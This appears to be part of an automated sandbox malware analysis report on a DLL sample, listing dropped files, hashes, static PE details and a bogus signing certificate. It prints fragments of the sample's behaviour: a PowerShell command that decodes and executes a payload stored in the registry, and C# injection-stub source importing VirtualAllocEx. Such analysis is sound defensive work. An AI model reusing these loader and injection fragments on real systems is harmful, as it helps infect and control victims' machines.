                                                                                                                                        MD5:6DBAD10FE981B42A57D18D5FF2DD1C56
                                                                                                                                        SHA1:54E9AD7E2809052A3878B353E40AEFA80DC475CE
                                                                                                                                        SHA-256:88888A234D988854A55C356B84AD30878811A606AA2D3D756BDF12007695B3F1
                                                                                                                                        SHA-512:A5EE3EF9D1B61137C55675ECAF735B161E9BEE7CE3D9A726D4BE4042807BAEDA6343A32BA881146E7017C4394EE21085E149E7AFB3FF363BE9175C9110C127FC
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ........S....c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP.................g#5.gn....4..............4.......C:\Users\user\AppData\Local\Temp\RES4E97.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\RES5D9B.tmp
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2184
                                                                                                                                        Entropy (8bit):2.7050262766852855
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:p+f3FtDfHnhKdNNI+ycuZhNIakS0PNnq9qpie9Ep:c3FxBKd31ulIa3Uq9t
                                                                                                                                        MD5:6F2FEF21A0F36272BA9E88D8AC064A18
                                                                                                                                        SHA1:C289B88E0720DF1C8A138E3D4BF1B7A1A2F75F31
                                                                                                                                        SHA-256:3B150FB86388D4BBF12965C7413A6E0451DF8AFF2B71A84F112C5E45C99BB134
                                                                                                                                        SHA-512:A8A6703A1AE5C9249A17044D1FC8DDB99E682ACC3099FC7E11958BBB21AD125D76DCE4C6778B15A19F8692C4D4FFEA5896A72A4DDE0380774876ADDCEFBF45EF
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ........T....c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP.....................I...u..+..........4.......C:\Users\user\AppData\Local\Temp\RES5D9B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3qnb4jl.iyx.psm1
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfn00foi.1d0.ps1
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        File Type:MSVC .res
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):652
                                                                                                                                        Entropy (8bit):3.081893161458861
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWak7Ynqq0PN5Dlq5J:+RI+ycuZhNIakS0PNnqX
                                                                                                                                        MD5:B61BDFA7E8C9E5B74904E603759D0A2B
                                                                                                                                        SHA1:05D469FB9525BC12387272985086D5EC5B590495
                                                                                                                                        SHA-256:BB57571BCD12C805E517C586AC4EA28DC027BB5DA03750AEBE9F845A41E6EA25
                                                                                                                                        SHA-512:921B1C33CBC454BE6D8F60AE6910436465567E9CF92D48C179717407D713BC37C7049BD58585BD258130631765EB651F92773DC7FD659E5E6E37009DE9BF9A9F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.x.f.x.a.r.l.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.x.f.x.a.r.l.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                        C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.0.cs
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):404
                                                                                                                                        Entropy (8bit):4.9942211774462395
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:V/DsYLDS81zuJoMRSRa+eNMjSSRrTdGO+aSRHq1nNLXT/JYy:V/DTLDfuo9eg5rpfUu9XjJYy
                                                                                                                                        MD5:EB2D8DF6DBF541C77F5579AF967A24D2
                                                                                                                                        SHA1:0A54F84D62B331BB66E798E6AB03C226432A4620
                                                                                                                                        SHA-256:4262A2B41845425832BD41961054DDB986DBC26824D7E948B983C6792E4A70C5
                                                                                                                                        SHA-512:B3F448932F267F7B81CA0E934ECC9509E6601A998BEF2545DA8C630B689912C699C990F111B66B1761C79F8DAEB4686B92E9C516F410000D357CAB38BF8363E9
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class xlq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint tqyhf,uint xrcgwwuqyy);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr ipglcmbr,IntPtr kxy,uint bmtfsmfyi,uint ahg,uint xsqlt);.. }..}.
                                                                                                                                        C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):369
                                                                                                                                        Entropy (8bit):5.210014486847792
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fHGSf1+zxs7+AEszIwkn23fHGSf39:p37Lvkmb6KRfPkWZEifPD9
                                                                                                                                        MD5:65773480B4F063EB440263048BA02E67
                                                                                                                                        SHA1:B9FEE5A0A4E64E715EDE1D8C50B3202B79C0BE24
                                                                                                                                        SHA-256:75C650986D6C163C73BB9FF77A0E45E8A1AAF159E4D8CE3FCD23962B39EA7438
                                                                                                                                        SHA-512:A928FDFDBE31B80CF60B7935CF37E4233BA628F81038D3CC44A302FAB49CD78D383C62F557252C6EA3B8DB3D97D155F3DD7BC497CE38F3EB42E46E61ED525CEE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.0.cs"
                                                                                                                                        C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3584
                                                                                                                                        Entropy (8bit):2.6095766041143733
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:etGSg8+mEej8MTxWTHfzUy/5dWxptkZfs030hEdI+ycuZhNIakS0PNnq:6qLjMTxaLUy/3WqJs036Ed1ulIa3Uq
                                                                                                                                        MD5:978F1126B0145748BA3876F455722438
                                                                                                                                        SHA1:91177A3FF15976E2F021FB8BFACABBC9404D8E5E
                                                                                                                                        SHA-256:A9FFAF5E3F9E2699D896615C5DEF62979A4DA54CF4E5498A6581CC789105BF38
                                                                                                                                        SHA-512:38354577A6FF510F90DEB93444871D59718F3F1550C6BDAA381A79362444F8DF16E30AD8CC11D4BF6094485DA2789D4179497F02FA4340A4E1C2E4B17878AEA2
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......_.........e.....k.....v..........................._.!..._...!._.&..._.......+.....4.0.....6.......H.......P..................................................<Module>.xxfxarla.dll.xlq.W32.mscor
                                                                                                                                        C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.out
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):412
                                                                                                                                        Entropy (8bit):4.871364761010112
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                        MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                        SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                        SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                        SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF4504015F5B500846.TMP
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):39625
                                                                                                                                        Entropy (8bit):0.5685821207118792
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:kBqoxKAuvScS+IOEVpIpqvjp8w67xy/wvjp8w67xy/cvjp8w67xy/V:kBqoxKAuvScS+IOEV+cS1zS1zS14
                                                                                                                                        MD5:7D017E40804872A6967221F8FA8EA61C
                                                                                                                                        SHA1:618080468210C6C39FDDD278BD1932A4E3F2EEA3
                                                                                                                                        SHA-256:0A218919221F4E2C87C37BA3E4202D38727D20C2101551847C1D5F0E60749D06
                                                                                                                                        SHA-512:744697E94FE83E76CA51D82AAFF7CE70CD2EE7B4C64A82FF30495EDE4BA0118244F17D75FB6A3E00C81A64E9E2B85076A1910D342FCBCDDD8C6AE9462A1BC26C
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF479DF3B05A4A00F7.TMP
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):12933
                                                                                                                                        Entropy (8bit):0.4077963317910342
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9loK9lo69lWqfH+ft:kBqoIVDGHat
                                                                                                                                        MD5:0546A3AE865F45C39304809ACD799AB5
                                                                                                                                        SHA1:CD670DB6B70F9466246DE51954188687DCB8F828
                                                                                                                                        SHA-256:55DEEDEB08F1874A1AB29975F57EC69F78D26D86710D9A40F7884B2DFA6537FC
                                                                                                                                        SHA-512:678020548BE08C60057D364285DF1403FDE95C6DADED3FDF93ABF602F7E9528BF8B8D0C5E29A41C45D280A719F258BACB6ED6D10D5866AF5FD290583AA53AA6B
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF8710D18D92ED7403.TMP
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13269
                                                                                                                                        Entropy (8bit):0.6079661487933163
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lox9loR9lW9aax9bYNBGpqp0:kBqoI6E9aolB
                                                                                                                                        MD5:188451753A2B17C0512342E4E2ED0E4A
                                                                                                                                        SHA1:0D0F0AEEAF1D83AD80EC462A5935CB7C07582713
                                                                                                                                        SHA-256:DD4C5FB7FCFCCE60255E4EB5BC77FF91B7A0CCFDB9837FBACC29B3603C272C0C
                                                                                                                                        SHA-512:5EEA9842E55925F6D3610E91F715C1B6426F9A619396ACD09719447D8C5F774FFD98617975D59D8B9F370AA88D58276C49AB659982A64AA055EAE6DD2E3CFB45
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF910CE8EC4F5B1959.TMP
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):39649
                                                                                                                                        Entropy (8bit):0.5732882512506094
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:kBqoxKAuvScS+WQKjQee2nzkEHV3e2nzkEHVze2nzkEHVY:kBqoxKAuqR+WQKjQepoU3poUzpoUY
                                                                                                                                        MD5:CFA564F4924E2738262D051D935C5A3A
                                                                                                                                        SHA1:A60896D7A5F13EC2A71766DDC0BD0274047EEF89
                                                                                                                                        SHA-256:FF0E57503F53FE644311C916730B720B65A071AA3CAC81FCEFF6B501CFE5BBBC
                                                                                                                                        SHA-512:64D58A0ADAD4CF148575F640431CE81A56EC8E8A2E4676FEC3C67B9B18F85D0C1AF745DB752E8522F726AB3C722957E401463C41E5D529AA4D7FC663A4D74095
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DFAD6E9A5E18A0DA50.TMP
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):39665
                                                                                                                                        Entropy (8bit):0.5787891092383902
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:kBqoxKAuvScS+Z3lUXNDolsHmNwJDolsHmNwVDolsHmNw6:kBqoxKAuqR+Z3lUXNDoluVDoluBDolum
                                                                                                                                        MD5:95A731AE184C27EE29F97876B4DA93E1
                                                                                                                                        SHA1:73A42DF5C765EBA870EDC658629B2B7D6F3AEB3F
                                                                                                                                        SHA-256:0D3AEAB84E5074CE95F78116B45C37C9CBED89B8C990E3CA8B0059DD3BBB759B
                                                                                                                                        SHA-512:7D14B12631F93843185BA987FF4D38CCC6E024C42D695F9DB04D0D4FBFB55BC1BBF3B29CD39B35A4E259FF9609CF9A8923A464B1EDC3895D6B865872ABBBBEAC
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DFEA23B8285776BCFF.TMP
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):39641
                                                                                                                                        Entropy (8bit):0.5715066214951078
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:kBqoxKAuvScS+gm89msV9ypun3JV9ypun3ZV9ypun3e:kBqoxKAuqR+gm89msX0I3JX0I3ZX0I3e
                                                                                                                                        MD5:7BCF794D5C86278EE8489285CB1A09AE
                                                                                                                                        SHA1:F7BFD1B7F2CC37576648C826070FE6AA516742B5
                                                                                                                                        SHA-256:B1031E28D65C657630334D6E9EF2F1BB20EAA1CB64C8CE3980EF6C67A62AB817
                                                                                                                                        SHA-512:17304E8F4B999C11C621D08CB2DFD6A3679595E1287398C48C652D4FF3C3911AEFA9FA878EFAF9757A3A88595FDC17986F2274C7BAE4797BDBB837C6C1235920
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\Documents\20201126\PowerShell_transcript.610930.b32Z8xp8.20201126013114.txt
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1189
                                                                                                                                        Entropy (8bit):5.30300433974105
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:BxSAb8i7vBZ1x2DOXUWOLCHGI4MW5HjeTKKjX4CIym1ZJXDvOLCHGI4TnxSAZ1:BZNvj1oORF4X5qDYB1ZXF4zZZ1
                                                                                                                                        MD5:D1058AABCCBD5E9E19341AFBF78C7952
                                                                                                                                        SHA1:EBEC89783A9B71C944893FF27E9EB4BD297E96EE
                                                                                                                                        SHA-256:8226FC4E59B37776E7F504828250933B7F2FBAE09F6DC68D8835EA25B415CDE3
                                                                                                                                        SHA-512:DA17B8D2A6613C66E9150C8C385AE237D33893AE4B389B1FDD16D93153CD7E1B467C7D5CBA79F38185D778941BC3AF38697B9410A8156A56A54BCA8E26AAF0C6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20201126013115..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 610930 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).Barclers))..Process ID: 6476..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201126013115..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).Barclers))..**********************..

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Entropy (8bit):3.880377900194029
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                                                                                        • Windows Screen Saver (13104/52) 1.29%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                        • VXD Driver (31/22) 0.00%
                                                                                                                                        File name:https___purefile24.top_4352wedfoifom.dll
                                                                                                                                        File size:558936
                                                                                                                                        MD5:e221c9a4b1ac13310d037cbc764b86d9
                                                                                                                                        SHA1:a7dbb7283b3b164993c1c122189e42509fe5573d
                                                                                                                                        SHA256:6b1e27915fa85d6bde40c512865e57c555e7bb02f1dc192a9b827c74c8984780
                                                                                                                                        SHA512:56c649d6a79f68924fe55973836f51cb10bbf1ed82366ea3be9be4f8dbf8e56aa4a2aedd933fa977d2109fd9abd7ea947d77e40659f00c80f645a18580cbf12c
                                                                                                                                        SSDEEP:3072:Nc5nfrXsurLtZ2kGUY+AcSId41dKB0C2Y:Nc5nzXsuVTQl1dKaY
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.._...........!...2.....h............... .......................................3.....................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:a02617310193a3a6

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x1007f8b0
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x10000000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                        DLL Characteristics:
                                                                                                                                        Time Stamp:0x5FBEB56D [Wed Nov 25 19:50:05 2020 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:c452b0123ca7b79d2cd265a40a5390d6

                                                                                                                                        Authenticode Signature

                                                                                                                                        Signature Valid:false
                                                                                                                                        Signature Issuer:CN=JEAEZQKUVJSPEEDBFJ
                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                        Error Number:-2146762487
                                                                                                                                        Not Before, Not After
                                                                                                                                        • 11/25/2020 2:44:53 PM 1/1/2040 12:59:59 AM
                                                                                                                                        Subject Chain
                                                                                                                                        • CN=JEAEZQKUVJSPEEDBFJ
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:5F9ACAF4F629A8226BDB67993D198FE8
                                                                                                                                        Thumbprint SHA-1:5E970E8E6B6FA3CF2DFB9AB123C6E900B49766E7
                                                                                                                                        Thumbprint SHA-256:334F4B69929098B867D4F3E1239A6EC6537AED3C7D3B0C58FC09D59F4DD8990D
                                                                                                                                        Serial:9464EC8C1ACE1D834B7123EDE0D13B58

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        push ebp
                                                                                                                                        mov ebp, esp
                                                                                                                                        sub esp, 7Ch
                                                                                                                                        mov dword ptr [ebp-08h], 00000001h
                                                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                                                        push 00000868h
                                                                                                                                        push 00000000h
                                                                                                                                        call dword ptr [100852B0h]
                                                                                                                                        test eax, eax
                                                                                                                                        je 00007FC418A422D4h
                                                                                                                                        int 42h
                                                                                                                                        mov eax, ebp
                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                        mov dword ptr [10088B34h], ecx
                                                                                                                                        mov dword ptr [10088B14h], ebp
                                                                                                                                        mov dword ptr [ebp-2Ch], 00000001h
                                                                                                                                        mov dword ptr [ebp-34h], 00000001h
                                                                                                                                        mov dword ptr [ebp-48h], 00000001h
                                                                                                                                        mov dword ptr [ebp-18h], 00000001h
                                                                                                                                        mov dword ptr [ebp-28h], 00000001h
                                                                                                                                        mov dword ptr [ebp-30h], 00000001h
                                                                                                                                        mov dword ptr [ebp-44h], 00000001h
                                                                                                                                        mov dword ptr [ebp-14h], 00000001h
                                                                                                                                        mov dword ptr [ebp-24h], 00000001h
                                                                                                                                        mov dword ptr [ebp-38h], 00000001h
                                                                                                                                        mov dword ptr [ebp-20h], 00000001h
                                                                                                                                        mov dword ptr [ebp-40h], 00000001h
                                                                                                                                        mov dword ptr [ebp-0Ch], 00000001h
                                                                                                                                        mov dword ptr [ebp-10h], 00000001h
                                                                                                                                        mov dword ptr [ebp-1Ch], 00000001h
                                                                                                                                        mov dword ptr [ebp-3Ch], 00000001h
                                                                                                                                        call dword ptr [10085464h]
                                                                                                                                        mov eax, dword ptr [ebp-18h]
                                                                                                                                        push eax
                                                                                                                                        call dword ptr [100856A8h]
                                                                                                                                        mov ecx, dword ptr [ebp-18h]
                                                                                                                                        push ecx
                                                                                                                                        call dword ptr [100856ACh]
                                                                                                                                        call dword ptr [100854D4h]

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8418c0xb4.data
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x8b0000x85c.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x872000x1558.data
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc10.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x84d700xb30.data
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x10000x801750x80200False0.147484756098data3.60387823769IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                        .data30x820000x640x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
